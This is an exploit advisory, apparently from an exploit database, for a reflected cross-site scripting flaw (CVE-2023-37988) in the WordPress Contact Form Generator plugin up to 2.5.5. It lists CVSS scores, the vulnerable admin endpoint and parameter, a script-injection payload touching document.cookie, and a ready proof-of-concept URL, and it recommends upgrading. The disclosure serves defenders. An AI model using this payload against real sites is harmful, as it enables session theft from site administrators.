WordPress Contact Form Generator 2.5.5 Cross Site Scripting Vulnerability

2023-10-0300:00:00

Arvandy

0day.today

293

wordpress

contact form

vulnerability

cross-site scripting

exploit

version 2.5.5

security patch

CVSS3

7.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

EPSS

0.001

Percentile

49.3%

JSON

# Exploit Title: WP Plugins Contact Form Generator 2.5.5 - Reflected Cross-Site Scripting
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/contact-form-generator/
# Vendor Homepage: https://www.creative-solutions.net/
# Version: 2.5.5 
# Tested on: Windows, Linux
# CVE: CVE-2023-37988

# Product Description
Contact Form Generator is a powerful contact form builder for WordPress! It is structured for creating Contact Forms, Application Forms, Reservation Forms, Survey Forms, Contact Data Pages and much more. You will get ready-to-use forms just after installation. Ref: https://wordpress.org/plugins/contact-form-generator/

# Vulnerability overview:
The Wordpress plugins Contact Form Generator (CFG) <= 2.5.5 is vulnerable to reflected cross-site scripting via the id parameter in the Edit Fields form. This vulnerability could allow an unauthenticated malicious actor to inject malicious scripts against high privilege users.

# Proof of Concept:
Affected Endpoint: /wp-admin/admin.php?page=cfg_fields&act=edit&id=
Affected Parameters: id
XSS Payload: "><script>alert(document.cookie)</script>x
http://example.com/wp-admin/admin.php?page=cfg_fields&act=edit&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ex

# Recommendation
Upgrade to version 2.6.0